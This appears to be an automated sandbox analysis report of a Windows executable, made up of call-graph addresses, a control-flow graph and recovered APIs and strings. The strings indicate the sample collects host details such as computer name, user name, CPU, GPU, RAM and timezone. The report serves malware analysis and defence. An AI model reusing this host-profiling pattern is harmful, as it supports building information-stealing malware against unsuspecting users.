__std_exception_destroy 13 API calls 66251->66253 66252->66243 66252->66248 66254 7ff6f1d9a570 66252->66254 66257 7ff6f1d9a147 66253->66257 66255 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66254->66255 66255->66258 66256->66222 66257->66241 66259 7ff6f1d9a17e _Receive_impl 66257->66259 66258->66205 66259->66250 66259->66260 66260->66207 66260->66208 66262 7ff6f1d9946c _Receive_impl 66261->66262 66263 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66262->66263 66264 7ff6f1d99504 66262->66264 66263->66264 66265 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66264->66265 66266 7ff6f1d9950a _Receive_impl 66265->66266 66268 7ff6f1d9957e 66266->66268 66362 7ff6f1d995a0 78 API calls 2 library calls 66266->66362 66269 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66268->66269 66270 7ff6f1d99591 66269->66270 66272 7ff6f1d7f227 66271->66272 66273 7ff6f1d7f1fe 66271->66273 66272->66183 66273->66272 66278 7ff6f1d7cdc0 82 API calls 66273->66278 66275 7ff6f1d7f25e 66276 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66275->66276 66277 7ff6f1d7f26f 66276->66277 66278->66275 66280 7ff6f1da1e8d 66279->66280 66281 7ff6f1da2a5c 66279->66281 66282 7ff6f1d9b780 84 API calls 66281->66282 66283 7ff6f1da2a9c 66282->66283 66284 7ff6f1da1af0 84 API calls 66283->66284 66285 7ff6f1da2ac2 66284->66285 66286 7ff6f1d9bd00 84 API calls 66285->66286 66287 7ff6f1da2ad2 66286->66287 66288 7ff6f1da2b3d 66287->66288 66289 7ff6f1da2add 66287->66289 66351 7ff6f1d93e90 80 API calls 66288->66351 66290 7ff6f1d92880 78 API calls 66289->66290 66293 7ff6f1da2ae7 66290->66293 66292 7ff6f1da2b49 66294 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66292->66294 66295 7ff6f1d7eec0 13 API calls 66293->66295 66296 7ff6f1da2b59 66294->66296 66297 7ff6f1da2af1 66295->66297 66352 7ff6f1d93e90 80 API calls 66296->66352 66299 7ff6f1d92880 78 API calls 66297->66299 66301 7ff6f1da2afb 66299->66301 66300 7ff6f1da2b66 66302 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66300->66302 66305 7ff6f1d92880 78 API calls 66301->66305 66303 7ff6f1da2b76 66302->66303 66353 7ff6f1d93e90 80 API calls 66303->66353 66307 7ff6f1da2b06 66305->66307 66306 7ff6f1da2b83 66308 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66306->66308 66310 7ff6f1d9c4d0 78 API calls 66307->66310 66309 7ff6f1da2b93 66308->66309 66354 7ff6f1da4430 80 API calls 66309->66354 66312 7ff6f1da2b14 66310->66312 66314 7ff6f1dfe860 _Strcoll 8 API calls 66312->66314 66313 7ff6f1da2ba0 66315 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66313->66315 66316 7ff6f1d9a2c4 66314->66316 66317 7ff6f1da2bb0 66315->66317 66316->66189 66355 7ff6f1d93e90 80 API calls 66317->66355 66319 7ff6f1da2bbd 66320 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66319->66320 66321 7ff6f1da2bcd 66320->66321 66356 7ff6f1d93e90 80 API calls 66321->66356 66323 7ff6f1da2bda 66324 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66323->66324 66325 7ff6f1da2bea 66324->66325 66357 7ff6f1d93e90 80 API calls 66325->66357 66327 7ff6f1da2bf7 66328 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66327->66328 66329 7ff6f1da2c07 66328->66329 66358 7ff6f1d93e90 80 API calls 66329->66358 66331 7ff6f1da2c14 66332 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66331->66332 66333 7ff6f1da2c24 66332->66333 66359 7ff6f1d93e90 80 API calls 66333->66359 66335 7ff6f1da2c31 66336 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66335->66336 66337 7ff6f1da2c41 66336->66337 66360 7ff6f1d93e90 80 API calls 66337->66360 66339 7ff6f1da2c4e 66340 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66339->66340 66341 7ff6f1da2c5e 66340->66341 66361 7ff6f1d93e90 80 API calls 66341->66361 66343 7ff6f1da2c6b 66344 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 66343->66344 66345 7ff6f1da2c7b 66344->66345 66346->66192 66347->66194 66348->66197 66349->66221 66350->66229 66351->66292 66352->66300 66353->66306 66354->66313 66355->66319 66356->66323 66357->66327 66358->66331 66359->66335 66360->66339 66361->66343 66367->66076 66369 7ff6f1d90af0 66370 7ff6f1d90b08 66369->66370 66371 7ff6f1d90b14 memcpy_s 66369->66371 66372 7ff6f1d90b25 memcpy_s 66371->66372 66373 7ff6f1d90c5e 66371->66373 66376 7ff6f1de7a44 66371->66376 66373->66372 66375 7ff6f1de7a44 _fread_nolock 87 API calls 66373->66375 66375->66372 66379 7ff6f1de7a64 66376->66379 66380 7ff6f1de7a8e 66379->66380 66391 7ff6f1de7a5c 66379->66391 66381 7ff6f1de7ada 66380->66381 66382 7ff6f1de7a9d memcpy_s 66380->66382 66380->66391 66392 7ff6f1de4934 EnterCriticalSection 66381->66392 66393 7ff6f1de4e68 11 API calls memcpy_s 66382->66393 66387 7ff6f1de7ab2 66394 7ff6f1de8234 78 API calls _invalid_parameter_noinfo 66387->66394 66391->66371 66393->66387 66394->66391 66395 7ff6f1debd30 66406 7ff6f1dec3bc EnterCriticalSection 66395->66406 66407 7ff6f1df4e91 66419 7ff6f1dfbf24 66407->66419 66420 7ff6f1de9eec _Getctype 78 API calls 66419->66420 66422 7ff6f1dfbf2d 66420->66422 66424 7ff6f1de98b4 78 API calls __std_fs_directory_iterator_open 66422->66424 66425 7ff6f1dd6290 66444 7ff6f1dcf9e0 66425->66444 66429 7ff6f1dd6333 66431 7ff6f1dd6457 66429->66431 66432 7ff6f1dd6365 memcpy_s _Receive_impl 66429->66432 66430 7ff6f1dd6381 66433 7ff6f1dfe860 _Strcoll 8 API calls 66430->66433 66434 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66431->66434 66432->66430 66457 7ff6f1dc86d0 122 API calls 66432->66457 66437 7ff6f1dd643e 66433->66437 66435 7ff6f1dd645c 66434->66435 66438 7ff6f1dd63bd 66458 7ff6f1dc8830 121 API calls 2 library calls 66438->66458 66440 7ff6f1dd63e4 66459 7ff6f1d8fe50 66440->66459 66466 7ff6f1dcdec0 66444->66466 66446 7ff6f1dcfa2d 66449 7ff6f1d86940 82 API calls 66446->66449 66456 7ff6f1dcfb47 66446->66456 66450 7ff6f1dcfa9e 66449->66450 66451 7ff6f1dcfb07 _Receive_impl 66450->66451 66453 7ff6f1dcfb42 66450->66453 66452 7ff6f1dfe860 _Strcoll 8 API calls 66451->66452 66454 7ff6f1dcfb2c GetVolumeInformationW 66452->66454 66455 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66453->66455 66454->66429 66454->66432 66455->66456 66473 7ff6f1dcdcd0 82 API calls Concurrency::cancel_current_task 66456->66473 66457->66438 66458->66440 66460 7ff6f1d8fe98 66459->66460 66461 7ff6f1d8fefc 66460->66461 66480 7ff6f1d94600 82 API calls 5 library calls 66460->66480 66463 7ff6f1d8ebc0 66461->66463 66481 7ff6f1d920b0 66463->66481 66465 7ff6f1d8ec0d 66465->66430 66467 7ff6f1dcdf3f 66466->66467 66470 7ff6f1dcdf20 66466->66470 66467->66470 66478 7ff6f1d98b50 82 API calls 5 library calls 66467->66478 66472 7ff6f1dce055 66470->66472 66474 7ff6f1e0b574 GetCurrentDirectoryW 66470->66474 66479 7ff6f1d98b50 82 API calls 5 library calls 66470->66479 66472->66446 66475 7ff6f1e0b586 66474->66475 66476 7ff6f1e0b595 GetLastError 66474->66476 66475->66476 66477 7ff6f1e0b58a 66475->66477 66476->66477 66477->66470 66478->66470 66479->66470 66480->66461 66482 7ff6f1d920ce 66481->66482 66483 7ff6f1d92120 _Receive_impl 66481->66483 66482->66483 66484 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66482->66484 66483->66465 66485 7ff6f1d921ac 66484->66485 66486 7ff6f1dd6c70 GetCurrentHwProfileW 66487 7ff6f1dd6cba 66486->66487 66490 7ff6f1dd6d19 66486->66490 66494 7ff6f1dc78f0 66487->66494 66489 7ff6f1dd6cc9 66489->66490 66506 7ff6f1ddfb34 85 API calls 66489->66506 66491 7ff6f1dfe860 _Strcoll 8 API calls 66490->66491 66493 7ff6f1dd6d91 66491->66493 66495 7ff6f1dc793e 66494->66495 66502 7ff6f1dc791f _Receive_impl 66494->66502 66497 7ff6f1d86940 82 API calls 66495->66497 66496 7ff6f1dfe860 _Strcoll 8 API calls 66498 7ff6f1dc79de 66496->66498 66499 7ff6f1dc7967 66497->66499 66498->66489 66507 7ff6f1dc7a00 10 API calls _Strcoll 66499->66507 66501 7ff6f1dc7975 66501->66502 66503 7ff6f1dc79ec 66501->66503 66502->66496 66504 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 66503->66504 66505 7ff6f1dc79f1 66504->66505 66506->66489 66507->66501 66508 7ff6f1dcfc10 66509 7ff6f1dcfc40 66508->66509 66510 7ff6f1e0b5b0 97 API calls 66509->66510 66511 7ff6f1dcfc59 66510->66511 66512 7ff6f1dfe860 _Strcoll 8 API calls 66511->66512 66513 7ff6f1dcfc96 66512->66513 66514 7ff6f1d947d5 66515 7ff6f1dfe888 std::_Facet_Register 82 API calls 66514->66515 66516 7ff6f1d947e7 66515->66516 66517 7ff6f1dfe888 std::_Facet_Register 82 API calls 66516->66517 66518 7ff6f1d94816 66517->66518 66523 7ff6f1db41f0 66518->66523 66521 7ff6f1dfe860 _Strcoll 8 API calls 66522 7ff6f1d94a73 66521->66522 66524 7ff6f1db4222 66523->66524 66534 7ff6f1d9483c 66523->66534 66525 7ff6f1dfe888 std::_Facet_Register 82 API calls 66524->66525 66526 7ff6f1db423d 66525->66526 66527 7ff6f1d929b0 82 API calls 66526->66527 66528 7ff6f1db425b 66527->66528 66535 7ff6f1d94770 66528->66535 66531 7ff6f1db41f0 82 API calls 66532 7ff6f1db42af 66531->66532 66533 7ff6f1db41f0 82 API calls 66532->66533 66533->66534 66534->66521 66536 7ff6f1d947be 66535->66536 66537 7ff6f1dfe860 _Strcoll 8 API calls 66536->66537 66538 7ff6f1d94a73 66537->66538 66538->66531 66539 7ff6f1ddc5cb 66540 7ff6f1ddc5f1 66539->66540 66559 7ff6f1ddc5dc 66539->66559 66541 7ff6f1ddc5fa 66540->66541 66555 7ff6f1ddc7bf 66540->66555 66543 7ff6f1d927e0 82 API calls 66541->66543 66558 7ff6f1ddc652 66541->66558 66542 7ff6f1ddc86f 66546 7ff6f1ddd050 84 API calls 66542->66546 66543->66558 66544 7ff6f1dfe860 _Strcoll 8 API calls 66545 7ff6f1ddceb3 66544->66545 66548 7ff6f1ddc888 66546->66548 66547 7ff6f1ddd050 84 API calls 66547->66555 66552 7ff6f1ddc570 8 API calls 66548->66552 66549 7ff6f1ddc722 66551 7ff6f1ddd050 84 API calls 66549->66551 66550 7ff6f1ddd050 84 API calls 66550->66558 66554 7ff6f1ddc75b 66551->66554 66552->66559 66553 7ff6f1ddc570 8 API calls 66553->66555 66557 7ff6f1ddc570 8 API calls 66554->66557 66555->66542 66555->66547 66555->66553 66557->66559 66558->66549 66558->66550 66560 7ff6f1ddc570 66558->66560 66559->66544 66561 7ff6f1ddc5a0 66560->66561 66562 7ff6f1dfe860 _Strcoll 8 API calls 66561->66562 66563 7ff6f1ddceb3 66562->66563 66563->66558 66564 7ff6f1de918c 66565 7ff6f1de91a2 66564->66565 66566 7ff6f1de91bd 66564->66566 66597 7ff6f1de4e68 11 API calls memcpy_s 66565->66597 66566->66565 66567 7ff6f1de91d6 66566->66567 66569 7ff6f1de91dc 66567->66569 66572 7ff6f1de91f9 66567->66572 66599 7ff6f1de4e68 11 API calls memcpy_s 66569->66599 66570 7ff6f1de91a7 66598 7ff6f1de8234 78 API calls _invalid_parameter_noinfo 66570->66598 66591 7ff6f1df33d0 66572->66591 66578 7ff6f1de9473 66579 7ff6f1de8284 _invalid_parameter_noinfo_noreturn 17 API calls 66578->66579 66581 7ff6f1de9488 66579->66581 66585 7ff6f1de923d 66586 7ff6f1de9256 66585->66586 66587 7ff6f1de92b6 66585->66587 66590 7ff6f1de91b3 66586->66590 66618 7ff6f1df3414 78 API calls _isindst 66586->66618 66587->66590 66619 7ff6f1df3414 78 API calls _isindst 66587->66619 66592 7ff6f1df33df 66591->66592 66593 7ff6f1de91fe 66591->66593 66620 7ff6f1dec3bc EnterCriticalSection 66592->66620 66600 7ff6f1df24e8 66593->66600 66597->66570 66598->66590 66599->66590 66601 7ff6f1df24f1 66600->66601 66602 7ff6f1de9213 66600->66602 66621 7ff6f1de4e68 11 API calls memcpy_s 66601->66621 66602->66578 66606 7ff6f1df2518 66602->66606 66604 7ff6f1df24f6 66622 7ff6f1de8234 78 API calls _invalid_parameter_noinfo 66604->66622 66607 7ff6f1df2521 66606->66607 66608 7ff6f1de9224 66606->66608 66623 7ff6f1de4e68 11 API calls memcpy_s 66607->66623 66608->66578 66612 7ff6f1df2548 66608->66612 66610 7ff6f1df2526 66624 7ff6f1de8234 78 API calls _invalid_parameter_noinfo 66610->66624 66613 7ff6f1df2551 66612->66613 66617 7ff6f1de9235 66612->66617 66625 7ff6f1de4e68 11 API calls memcpy_s 66613->66625 66615 7ff6f1df2556 66626 7ff6f1de8234 78 API calls _invalid_parameter_noinfo 66615->66626 66617->66578 66617->66585 66618->66590 66619->66590 66621->66604 66622->66602 66623->66610 66624->66608 66625->66615 66626->66617 66627 7ff6f1d9d9e6 66628 7ff6f1d9da02 66627->66628 66629 7ff6f1d9e200 82 API calls 66628->66629 66630 7ff6f1d9d5b0 66628->66630 66629->66630 66631 7ff6f1d87633 66632 7ff6f1d7da40 78 API calls 66631->66632 66633 7ff6f1d87666 FindNextFileW 66632->66633 66634 7ff6f1d87684 66633->66634 66635 7ff6f1dfe860 _Strcoll 8 API calls 66634->66635 66636 7ff6f1d876ab 66635->66636 66637 7ff6f1de9aa8 66648 7ff6f1de990c 66637->66648 66639 7ff6f1de9acf 66642 7ff6f1de9b49 66654 7ff6f1de9934 66642->66654 66643 7ff6f1de9b08 66643->66639 66643->66642 66666 7ff6f1dee768 78 API calls 2 library calls 66643->66666 66646 7ff6f1de9b3d 66646->66642 66667 7ff6f1df0318 11 API calls 2 library calls 66646->66667 66649 7ff6f1de9915 66648->66649 66650 7ff6f1de9925 66648->66650 66668 7ff6f1de4e68 11 API calls memcpy_s 66649->66668 66650->66639 66650->66643 66665 7ff6f1de9a2c 78 API calls _invalid_parameter_noinfo 66650->66665 66652 7ff6f1de991a 66669 7ff6f1de8234 78 API calls _invalid_parameter_noinfo 66652->66669 66655 7ff6f1de990c _fread_nolock 78 API calls 66654->66655 66656 7ff6f1de9959 66655->66656 66657 7ff6f1de99fa 66656->66657 66658 7ff6f1de9969 66656->66658 66679 7ff6f1dece18 78 API calls 2 library calls 66657->66679 66660 7ff6f1de9987 66658->66660 66663 7ff6f1de99a5 66658->66663 66678 7ff6f1dece18 78 API calls 2 library calls 66660->66678 66662 7ff6f1de9995 66662->66639 66663->66662 66670 7ff6f1df0f48 66663->66670 66665->66643 66666->66646 66667->66642 66668->66652 66669->66650 66671 7ff6f1df0f78 66670->66671 66680 7ff6f1df0d7c 66671->66680 66674 7ff6f1df0fb7 66676 7ff6f1df0fcc 66674->66676 66692 7ff6f1ddf864 78 API calls 2 library calls 66674->66692 66676->66662 66678->66662 66679->66662 66681 7ff6f1df0da5 66680->66681 66682 7ff6f1df0dd3 66680->66682 66681->66674 66691 7ff6f1ddf864 78 API calls 2 library calls 66681->66691 66683 7ff6f1df0dec 66682->66683 66685 7ff6f1df0e43 66682->66685 66694 7ff6f1de8168 78 API calls 2 library calls 66683->66694 66693 7ff6f1df555c EnterCriticalSection 66685->66693 66691->66674 66692->66676 66694->66681 66695 7ff6f1ddc8c9 66696 7ff6f1ddc8f4 66695->66696 66709 7ff6f1ddc8df 66695->66709 66697 7ff6f1ddcac0 66696->66697 66698 7ff6f1ddc8fd 66696->66698 66699 7ff6f1ddcb29 66697->66699 66703 7ff6f1ddc570 8 API calls 66697->66703 66705 7ff6f1d98e80 82 API calls 66698->66705 66708 7ff6f1ddc95a memcpy_s 66698->66708 66700 7ff6f1ddc570 8 API calls 66699->66700 66700->66709 66701 7ff6f1dfe860 _Strcoll 8 API calls 66704 7ff6f1ddceb3 66701->66704 66702 7ff6f1ddca4a 66706 7ff6f1ddc570 8 API calls 66702->66706 66703->66697 66705->66708 66706->66709 66707 7ff6f1ddc570 8 API calls 66707->66708 66708->66702 66708->66707 66709->66701

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 7ff6f1dd8330-7ff6f1dd87cc call 7ff6f1dd6540 call 7ff6f1dd6460 call 7ff6f1dd6860 call 7ff6f1dd6150 call 7ff6f1dd61f0 call 7ff6f1dd8030 call 7ff6f1dd5fc0 call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 GlobalMemoryStatusEx 63 7ff6f1dd87d5-7ff6f1dd87e6 0->63 64 7ff6f1dd87ce-7ff6f1dd87d3 0->64 65 7ff6f1dd87ea-7ff6f1dd8af1 call 7ff6f1d93ff0 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 63->65 64->65 96 7ff6f1dd8af4-7ff6f1dd8afc 65->96 96->96 97 7ff6f1dd8afe-7ff6f1dd8b6c call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1dd5b70 96->97 106 7ff6f1dd8b6e 97->106 107 7ff6f1dd8b71-7ff6f1dd8c6d call 7ff6f1d95310 call 7ff6f1d955e0 call 7ff6f1d986b0 call 7ff6f1d91900 97->107 106->107 116 7ff6f1dd8c70-7ff6f1dd8c78 107->116 116->116 117 7ff6f1dd8c7a-7ff6f1dd8cd7 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 116->117 124 7ff6f1dd8d0b-7ff6f1dd8d26 117->124 125 7ff6f1dd8cd9-7ff6f1dd8ceb 117->125 128 7ff6f1dd8d59-7ff6f1dd8edc call 7ff6f1dd59a0 call 7ff6f1d955e0 call 7ff6f1d986b0 call 7ff6f1d91900 124->128 129 7ff6f1dd8d28-7ff6f1dd8d39 124->129 126 7ff6f1dd8ced-7ff6f1dd8d00 125->126 127 7ff6f1dd8d06 call 7ff6f1dfe880 125->127 126->127 133 7ff6f1dd9b0f-7ff6f1dd9b14 call 7ff6f1de8254 126->133 127->124 153 7ff6f1dd8ee0-7ff6f1dd8ee8 128->153 130 7ff6f1dd8d54 call 7ff6f1dfe880 129->130 131 7ff6f1dd8d3b-7ff6f1dd8d4e 129->131 130->128 131->130 135 7ff6f1dd9b15-7ff6f1dd9b1a call 7ff6f1de8254 131->135 133->135 145 7ff6f1dd9b1b-7ff6f1dd9b20 call 7ff6f1de8254 135->145 151 7ff6f1dd9b21-7ff6f1dd9b26 call 7ff6f1de8254 145->151 156 7ff6f1dd9b27-7ff6f1dd9b2c call 7ff6f1de8254 151->156 153->153 155 7ff6f1dd8eea-7ff6f1dd8f3d call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 153->155 168 7ff6f1dd8f3f-7ff6f1dd8f50 155->168 169 7ff6f1dd8f70-7ff6f1dd8fcd call 7ff6f1de840c call 7ff6f1de948c call 7ff6f1de9898 155->169 163 7ff6f1dd9b2d-7ff6f1dd9b32 call 7ff6f1de8254 156->163 170 7ff6f1dd9b33-7ff6f1dd9b38 call 7ff6f1de8254 163->170 171 7ff6f1dd8f52-7ff6f1dd8f65 168->171 172 7ff6f1dd8f6b call 7ff6f1dfe880 168->172 186 7ff6f1dd8fd0-7ff6f1dd8fd8 169->186 179 7ff6f1dd9b39-7ff6f1dd9b3e call 7ff6f1de8254 170->179 171->145 171->172 172->169 185 7ff6f1dd9b3f-7ff6f1dd9b44 call 7ff6f1de8254 179->185 191 7ff6f1dd9b45-7ff6f1dd9b4a call 7ff6f1de8254 185->191 186->186 188 7ff6f1dd8fda-7ff6f1dd90dc call 7ff6f1d986b0 call 7ff6f1d955e0 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 186->188 218 7ff6f1dd910f-7ff6f1dd9167 call 7ff6f1e11650 GetModuleFileNameA 188->218 219 7ff6f1dd90de-7ff6f1dd90ef 188->219 197 7ff6f1dd9b4b-7ff6f1dd9b50 call 7ff6f1de8254 191->197 203 7ff6f1dd9b51-7ff6f1dd9b56 call 7ff6f1de8254 197->203 209 7ff6f1dd9b57-7ff6f1dd9b5c call 7ff6f1de8254 203->209 215 7ff6f1dd9b5d-7ff6f1dd9b62 call 7ff6f1de8254 209->215 223 7ff6f1dd9b63-7ff6f1dd9b68 call 7ff6f1de8254 215->223 229 7ff6f1dd9170-7ff6f1dd9178 218->229 221 7ff6f1dd90f1-7ff6f1dd9104 219->221 222 7ff6f1dd910a call 7ff6f1dfe880 219->222 221->151 221->222 222->218 229->229 230 7ff6f1dd917a-7ff6f1dd92a2 call 7ff6f1d986b0 call 7ff6f1d95310 call 7ff6f1d955e0 call 7ff6f1d986b0 call 7ff6f1d91900 229->230 241 7ff6f1dd92a5-7ff6f1dd92ad 230->241 241->241 242 7ff6f1dd92af-7ff6f1dd930d call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 241->242 249 7ff6f1dd930f-7ff6f1dd9320 242->249 250 7ff6f1dd9340-7ff6f1dd935b 242->250 251 7ff6f1dd9322-7ff6f1dd9335 249->251 252 7ff6f1dd933b call 7ff6f1dfe880 249->252 253 7ff6f1dd938f-7ff6f1dd93b9 call 7ff6f1dd76a0 250->253 254 7ff6f1dd935d-7ff6f1dd936f 250->254 251->156 251->252 252->250 261 7ff6f1dd93be-7ff6f1dd94ae call 7ff6f1d95310 call 7ff6f1d955e0 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 253->261 262 7ff6f1dd93bb 253->262 255 7ff6f1dd9371-7ff6f1dd9384 254->255 256 7ff6f1dd938a call 7ff6f1dfe880 254->256 255->163 255->256 256->253 277 7ff6f1dd94e4-7ff6f1dd94fb 261->277 278 7ff6f1dd94b0-7ff6f1dd94c4 261->278 262->261 281 7ff6f1dd952e-7ff6f1dd964c call 7ff6f1d95310 call 7ff6f1d955e0 call 7ff6f1d986b0 call 7ff6f1d91900 277->281 282 7ff6f1dd94fd-7ff6f1dd950e 277->282 279 7ff6f1dd94df call 7ff6f1dfe880 278->279 280 7ff6f1dd94c6-7ff6f1dd94d9 278->280 279->277 280->170 280->279 295 7ff6f1dd9651-7ff6f1dd9658 281->295 285 7ff6f1dd9510-7ff6f1dd9523 282->285 286 7ff6f1dd9529 call 7ff6f1dfe880 282->286 285->179 285->286 286->281 295->295 296 7ff6f1dd965a-7ff6f1dd96b4 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 295->296 303 7ff6f1dd96ea-7ff6f1dd970a 296->303 304 7ff6f1dd96b6-7ff6f1dd96ca 296->304 307 7ff6f1dd97e2-7ff6f1dd989e call 7ff6f1d937f0 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 303->307 308 7ff6f1dd9710-7ff6f1dd97dd call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 303->308 305 7ff6f1dd96e5 call 7ff6f1dfe880 304->305 306 7ff6f1dd96cc-7ff6f1dd96df 304->306 305->303 306->185 306->305 330 7ff6f1dd98a3-7ff6f1dd98bb call 7ff6f1d93ff0 307->330 308->330 333 7ff6f1dd98ee-7ff6f1dd9909 330->333 334 7ff6f1dd98bd-7ff6f1dd98ce 330->334 335 7ff6f1dd990b-7ff6f1dd991c 333->335 336 7ff6f1dd993c-7ff6f1dd9953 333->336 337 7ff6f1dd98d0-7ff6f1dd98e3 334->337 338 7ff6f1dd98e9 call 7ff6f1dfe880 334->338 340 7ff6f1dd991e-7ff6f1dd9931 335->340 341 7ff6f1dd9937 call 7ff6f1dfe880 335->341 342 7ff6f1dd9955-7ff6f1dd9969 336->342 343 7ff6f1dd9989-7ff6f1dd99a3 336->343 337->191 337->338 338->333 340->197 340->341 341->336 345 7ff6f1dd9984 call 7ff6f1dfe880 342->345 346 7ff6f1dd996b-7ff6f1dd997e 342->346 347 7ff6f1dd99a5-7ff6f1dd99b9 343->347 348 7ff6f1dd99d9-7ff6f1dd99f3 343->348 345->343 346->203 346->345 352 7ff6f1dd99d4 call 7ff6f1dfe880 347->352 353 7ff6f1dd99bb-7ff6f1dd99ce 347->353 349 7ff6f1dd99f5-7ff6f1dd9a09 348->349 350 7ff6f1dd9a29-7ff6f1dd9a43 348->350 355 7ff6f1dd9a24 call 7ff6f1dfe880 349->355 356 7ff6f1dd9a0b-7ff6f1dd9a1e 349->356 357 7ff6f1dd9a45-7ff6f1dd9a59 350->357 358 7ff6f1dd9a79-7ff6f1dd9a93 350->358 352->348 353->209 353->352 355->350 356->215 356->355 360 7ff6f1dd9a74 call 7ff6f1dfe880 357->360 361 7ff6f1dd9a5b-7ff6f1dd9a6e 357->361 362 7ff6f1dd9ac5-7ff6f1dd9b08 call 7ff6f1dfe860 358->362 363 7ff6f1dd9a95-7ff6f1dd9aa9 358->363 360->358 361->223 361->360 366 7ff6f1dd9ac0 call 7ff6f1dfe880 363->366 367 7ff6f1dd9aab-7ff6f1dd9abe 363->367 366->362 367->366 369 7ff6f1dd9b09-7ff6f1dd9b0e call 7ff6f1de8254 367->369 369->133
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Name$DevicesDisplayEnum$ComputerFileGlobalMemoryModuleStatusUserValuewcsftime
                                                                                                                • String ID: %d-%m-%Y, %H:%M:%S$computer_name$cpu$gpu$ram$system$time$timezone$user_name
                                                                                                                • API String ID: 4122120932-1182675529
                                                                                                                • Opcode ID: de373a628c70196d38e0a230efad4b6935ad6b5f4b2a48b3459ff8ff9c5d3fed
                                                                                                                • Instruction ID: 45129ffbe7eee4db623ffa7e56d987a4fb7c8384f2e0d42c99b99fec0e07223b
                                                                                                                • Opcode Fuzzy Hash: de373a628c70196d38e0a230efad4b6935ad6b5f4b2a48b3459ff8ff9c5d3fed
                                                                                                                • Instruction Fuzzy Hash: 79E27033A18BC595D721CF25D8902ED77A1FB89798F409325EAAD47BA9EF38D244C700
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
